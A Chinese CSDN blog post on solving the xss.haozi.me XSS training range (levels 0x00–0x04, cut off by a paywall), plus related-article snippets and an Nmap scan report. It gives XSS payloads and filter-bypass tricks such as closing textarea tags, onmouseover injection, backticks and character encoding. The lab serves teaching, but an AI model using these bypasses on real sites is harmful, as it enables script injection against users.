xss.haozi 思路总结 0x00-0x12

最新推荐文章于 2024-03-13 08:00:00 发布
最新推荐文章于 2024-03-13 08:00:00 发布
阅读量1.5k 收藏 6
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yukinorong/article/details/99852935
版权

xss刷题网站2 https://xss.haozi.me/

一个非常可爱的网站。这是网站界面,题目序号是十六进制,一共19道题。
在这里插入图片描述

0x00

直接输入<script>alert(1)</script>

0x01

先闭合textarea框再实现</textarea><script>alert(1)</script>

0x02

在input框中,先引号闭合,再输入onmouseover="alert(1)">
太强了,在input code中输入是实时反馈的,强推这个网站。

0x03

题目过滤了(),利用反引号`绕过
反引号可以替代单双引号

0x04

题目过滤了()`,利用字符编码绕过
<img src="" onerror=javascript:ale

最低0.47元/天 解锁文章
图南yukino
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss.haozi.me弹窗练习0x00-0x10
weixin_52159400的博客
07-28 316
alert(1)
xss.haozi练习通关详解
爱国小白帽
11-05 2506
题目连接:https://xss.haozi.me 0x00 原理解读: 这个游戏是要弹图片才算通关的,光弹窗不行,所以第一关就用最简单的img标签过 payload: <img src="任意图片名" onerror="alert(1)"> 0x01 原理解读: 从server code中可以看到输入的内容被插入到了<textarea>标签中,所以只要闭合这个标签就行了 payload: </textarea><img src="任意图片名" onerror=
xss.haozi.me练习通关
lml_0916的博客
07-27 566
这里将auto或者on过滤成了_,并且是在input标签输出,所以这里可以将type的值改成imge的形式进行输出,并且使用换行的方式来停止以on开头=结尾变成_。这一关是将括号给过滤掉了,也就是说alert()的括号不可以直接打印出来,所以这里可以采用两种方式,一种是编码的形式,另一种就是使用反引号来代替括号。这一关限制了不可以对style标签进行闭合,一旦出现会转变为“坏人”,但是html中将标签换行也是可以识别的,所以可以换行处理标签。将src闭合,然后写弹窗,然后将后面注释。............
XXS靶场haozi
m0_61579490的博客
08-02 464
XXS靶场之线上靶场haozi
XSS靶场(二)xss.haozi
C_LCH_2000的博客
07-29 285
xss.haozi所有关卡解法
xss.haozi.me
沐目的博客
07-09 5062
集训第二周 星期一 第二个星期了,再发一篇。感觉自己好像没学什么东西。就学了个HTML和JavaScript。今天开始XSS的实战,这篇博客主要就是写一下题解。 先给出XSS靶场的地址: https://xss.haozi.me/#/0x00 我是在谷歌上写的,不知道为什么同样的payload在火狐上不能用。 0x00 第一关应该没什么讲的吧,啥都没有,直接给payload了。 <img ...
xss.js.zip
07-29
XSS(Cross-Site Scripting)攻击是一种常见的网络安全威胁,主要发生在Web应用中。它利用了网站的信任,将恶意脚本注入到网页中,当其他用户访问这些被篡改的页面时,恶意脚本会在用户的浏览器上执行,从而窃取用户...
xss-labs-master.rar
05-09
总结,"xss-labs-master.rar" 是一个宝贵的XSS学习资源,它不仅涵盖了XSS的基础理论,还提供了实战经验,对于想要深入理解和防范XSS攻击的人来说,是一次难得的训练机会。通过系统地完成这二十个关卡,你将能够更好...
xss-filter-spring-boot-starter:springboot自动xss
05-17
xss-filter-spring-boot-starter springboot自动xss 使用方法在项目的pom.xml中加入依赖即口 <groupId>com.djk</groupId> <artifactId>xss-filter-spring-boot-starter <version>0.0.1 目前支持3种入参数xss...
XSS-Cheat-Sheet-2020-Edition.pdf
05-06
It’s about Cross-Site Scripting (XSS), the most widespread and common flaw found in the World Wide Web. You must be familiar with (at least) basic concepts of this flaw to enjoy this book. For that ...
计算机后端-PHP视频教程. php之blog实战52-xss攻击与防范.wmv
05-22
计算机后端-PHP视频教程. php之blog实战52-xss攻击与防范.wmv
xss靶场练习(一)之xss.haozi.me
angry_program的博客
01-29 7372
目录 前言 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 0x08 0x09 0x0A 0x0B 0x0C 0x0D 0x0E 0x0F 0x10 0x11 0x12 前言 xss实战第一部曲, 实战的靶场是部署在github上的, 所以可能有些延迟(你懂的), 然后给出地址: https://xss.hao...
xss靶场练习之xss.haozi.me解析及答案
lyz_yyds107的博客
08-05 745
靶场绕过
XSShaozi me 题解——人生第一份CSDN题解
Mr_Fmnwon的博客
08-05 659
XSS 靶场:xss.haozi.me 认真写的第一篇WP,以此总结,以此自勉
xss.haozi.me靶场详解
m0_46467017的博客
07-28 2070
由于xss.haozi.me是一个在线靶场,服务部署在Github,若网速不好,则需要科学上网。由于本靶场是一个白盒测试的靶场,我们可以看到代码的源码,所以可以直接根据源码的限制的条件来思考如何绕过。...
xss.haozi.me靶场“0x0B-0x12”通关教程
最新发布
钟言的博客
03-13 4506
本篇xss.haozi.me靶场的“0x0B-0x12”通关教程,详细内容包含了一、0x0B 实体编码绕过 二、0x0C script绕过 三、0x0D 注释绕过 四、0X0E ſ符号绕过 五、0x0F 编码解码 六、0x10 直接执行 七、0x11 闭合绕过 八、0x12 闭合绕过等内容
xss.haozi.me靶场“0x00-0x0A”通关教程
钟言的博客
03-12 5318
本篇介绍了xss.haozi.me靶场0x00到0x0A通关教程,详细内容包含了:一、靶场介绍 二、第一关 0x00 不做限制 三、第二关 0x01 文本闭合标签绕过 四、第三关 0x02 双引号闭合绕过 五、第四关 0x03 过滤括号 六、第五关 0x04 编码绕过 七、第六关 0x05 注释闭合绕过 八、第七关 0x06 换行绕过 九、第八关 0x07 删除标签 十、第九关 0x08 多加空格绕过 十一、第十关 0x09 闭合绕过 十二、第十一关 0x0A JS调用等内容
xss的简单思路总结
weixin_46640267的博客
07-10 460
xss只是跨站脚本攻击的缩写,原理为往web页面里插入恶意的js代码,而当页面被访问时,被插入的恶意代码就会被执行,最简单的例子就是弹窗 <script>alert(document.cookie)</script> 通常在开发过程中,程序员都会考虑安全问题,从而也演变出了一些过滤的方法,像自带的htmlspecialchars()函数 其作用是把预定义的字符转换为HTML实体,通俗点来讲就是连着标签一起强行打印出来,例: <?php $a = "<script&gt
请帮我翻译 Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-08 15:58 CST Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for MiWiFi-RA72-srv (192.168.31.244) Host is up (0.026s latency). Not shown: 995 closed tcp ports (reset) PORT STATE SERVICE 80/tcp open http |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ 443/tcp open https |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 631/tcp open ipp 8080/tcp open http-proxy 9100/tcp open jetdirect MAC Address: 6C:02:E0:20:74:2A (HP) Nmap done: 1 IP address (1 host up) scanned in 193.99 seconds
06-09
在2023年6月8日15:58 CST,开始扫描MiWiFi-RA72-srv (192.168.31.244)。预扫描脚本结果如下:| broadcast-avahi-dos: | 发现主机:| 224.0.0.251 | 在NULL UDP avahi数据包DoS之后(CVE-2011-1002),主机都是活跃的(没有漏洞)。 未显示:995个关闭的TCP端口(已重置)。端口状态和服务如下:80/tcp open http,443/tcp open https,631/tcp open ipp,8080/tcp open http-proxy,9100/tcp open jetdirect。MAC地址为6C:02:E0:20:74:2A(HP)。HTTP扫描结果:|_http-csrf:找不到任何CSRF漏洞。|_http-dombased-xss:找不到任何基于DOM的XSS。|_http-stored-xss:找不到任何存储的XSS漏洞。| http-slowloris-check:| 易受攻击:慢速loris DOS攻击| 状态:可能易受攻击| IDs:CVE:CVE-2007-6750 |慢速loris试图保持许多连接到目标网络服务器的打开状态,并尽可能长时间保持它们打开。它通过向目标网络服务器打开连接并发送部分请求来实现这一点。通过这样做,它会使http服务器的资源饥饿,从而导致拒绝服务。| |披露日期:2009-09-17| 引用:| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750|_ http://ha.ckers.org/slowloris/。扫描完成:1个IP地址(1个主机)在193.99秒内扫描。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值